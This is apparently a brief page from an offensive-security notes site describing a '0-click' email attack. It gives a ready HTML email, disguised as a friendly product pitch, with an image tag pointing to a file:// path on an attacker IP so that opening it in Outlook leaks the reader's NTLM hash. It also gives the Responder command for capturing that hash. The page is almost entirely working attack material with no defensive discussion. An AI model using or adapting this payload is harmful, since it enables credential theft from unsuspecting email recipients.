đ§ââïž0-Click Email Attack
HTML Email (To grab the user's NTLM hash when he/she opens the outlook email)
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<p>
Hi Person, <br/>
I just wanted to write you an email to show you our really cool
product: <img src="file://192.168.159.149/anything" />
<br/>
Thanks,
Mantis,
</p>
</body>
</html>
Start Responder
python3 Responder.py -I 192.168.159.149
Last updated
Was this helpful?